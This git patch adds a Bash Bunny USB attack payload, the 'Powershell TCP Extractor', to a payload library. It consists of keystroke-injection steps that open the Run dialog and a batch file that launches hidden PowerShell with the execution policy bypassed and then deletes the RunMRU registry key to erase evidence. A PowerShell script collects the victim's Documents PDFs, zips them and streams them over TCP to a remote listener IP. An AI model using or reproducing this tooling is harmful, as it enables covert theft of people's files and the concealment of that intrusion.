From fc1d812d961b70fafeff52b45abc8dabaa841996 Mon Sep 17 00:00:00 2001 From: SirLurkSalot Date: Thu, 6 Apr 2017 23:49:35 -0500 Subject: [PATCH] Added PowershellTCPExtractor (#144) --- .../Powershell_TCP_Extractor/copyMoveData.ps1 | 34 +++++++++++++++++++ .../library/Powershell_TCP_Extractor/d.cmd | 10 ++++++ .../Powershell_TCP_Extractor/payload.txt | 21 ++++++++++++ .../Powershell_TCP_Extractor/readme.md | 24 +++++++++++++ 4 files changed, 89 insertions(+) create mode 100644 payloads/library/Powershell_TCP_Extractor/copyMoveData.ps1 create mode 100644 payloads/library/Powershell_TCP_Extractor/d.cmd create mode 100644 payloads/library/Powershell_TCP_Extractor/payload.txt create mode 100644 payloads/library/Powershell_TCP_Extractor/readme.md diff --git a/payloads/library/Powershell_TCP_Extractor/copyMoveData.ps1 b/payloads/library/Powershell_TCP_Extractor/copyMoveData.ps1 new file mode 100644 index 00000000..151d5232 --- /dev/null +++ b/payloads/library/Powershell_TCP_Extractor/copyMoveData.ps1 @@ -0,0 +1,34 @@ +#edit ip and port of your listener... listener is on the machine you want to send data to... I use netcat as listener... (example command on kali.. [nc -l -p 54321 > out.file]) +[int] $Port = 54321 +$IP = "192.168.222.63" +#edit this to specify your target +$rootFolder = "$ENV:UserProfile\Documents" +#edit include to specify filetypes...(*.doc*,*.txt,*.jpg) whatevs... +$files = Get-ChildItem -Path $rootFolder -Include *.pdf -Recurse + +#only edit under this if you know what you are doing +#temp location to perform file copy and zip +$tempFolderRoot = $env:APPDATA +$tempFolderFinal = $tempFolderRoot+"\"+$env:UserName+"-Docs" +New-Item -ItemType directory -Path $tempFolderFinal -Force +foreach($file in $files) +{Copy-Item "$file" -destination $tempFolderFinal} +$CompressionToUse = [System.IO.Compression.CompressionLevel]::Fastest +$IncludeBaseFolder = $false +$zipTo = "{0}\{1}.zip" -f $tempFolderRoot,"ZIPPED" +[Reflection.Assembly]::LoadWithPartialName( "System.IO.Compression.FileSystem" ) +[System.IO.Compression.ZipFile]::CreateFromDirectory($tempFolderFinal, $ZipTo, $CompressionToUse, $IncludeBaseFolder) +$Address = [system.net.IPAddress]::Parse($IP) +$socket = new-object System.Net.Sockets.TcpClient +$socket.connect($Address, $port) +$stream = $socket.GetStream() +$file = Get-Item $Env:APPDATA\ZIPPED.zip +$fileData = [IO.File]::ReadAllBytes($file) +$stream.Write($fileData, 0, $fileData.Length) +$stream.Close() +$Socket.Close() + +#clean up temp files +Remove-Item $tempFolderFinal -RECURSE +Remove-Item $Env:APPDATA\ZIPPED.zip + \ No newline at end of file diff --git a/payloads/library/Powershell_TCP_Extractor/d.cmd b/payloads/library/Powershell_TCP_Extractor/d.cmd new file mode 100644 index 00000000..782f0de8 --- /dev/null +++ b/payloads/library/Powershell_TCP_Extractor/d.cmd @@ -0,0 +1,10 @@ +@echo off + +Rem run powershell script with bypass,nologo, and hidden flag +Start "" powershell.exe -ExecutionPolicy Bypass -nologo -WindowStyle Hidden -File %~dp0\copyMoveData.ps1 + +REM Delete registry key storing Run dialog history...to clean up evidence +REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f + +@cls +@exit \ No newline at end of file diff --git a/payloads/library/Powershell_TCP_Extractor/payload.txt b/payloads/library/Powershell_TCP_Extractor/payload.txt new file mode 100644 index 00000000..b0ccbae6 --- /dev/null +++ b/payloads/library/Powershell_TCP_Extractor/payload.txt @@ -0,0 +1,21 @@ +#!/bin/bash +# +# Title: Powershell Extractor +# Author: $irLurk$alot +# Version: 1.0 +# Target: Windows +# +# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn runs powershell script to copy move and extract data. + +# Source bunny_helpers.sh to get environment variable SWITCH_POSITION +source bunny_helpers.sh + +LED R 100 +ATTACKMODE HID STORAGE +QUACK GUI r +QUACK DELAY 100 +LED R B 100 +QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" +QUACK ENTER +LED R G B diff --git a/payloads/library/Powershell_TCP_Extractor/readme.md b/payloads/library/Powershell_TCP_Extractor/readme.md new file mode 100644 index 00000000..be0d5ad7 --- /dev/null +++ b/payloads/library/Powershell_TCP_Extractor/readme.md @@ -0,0 +1,24 @@ +# Powershell TCP extractor for Bash Bunnys + +* Author: $irLurk$alot +* Version: Version 1.0 +* Target: Windows + +## Description + +Copies data to temp directory and uses powershell tcp socket to extract to a listener on remote machine + +## Configuration +The payload copies target to %APPDATA%, change this to wherever you like by editing powershell script, +it then zips data and sends data to listener on a remote machine, also specified in powershell script. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red | Attack Setup | +| Purple | Attack Execution | +| White | Attack Complete (safe to remove Bunny) | +| | Script will continue to run and transmit | +## Discussion +[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread")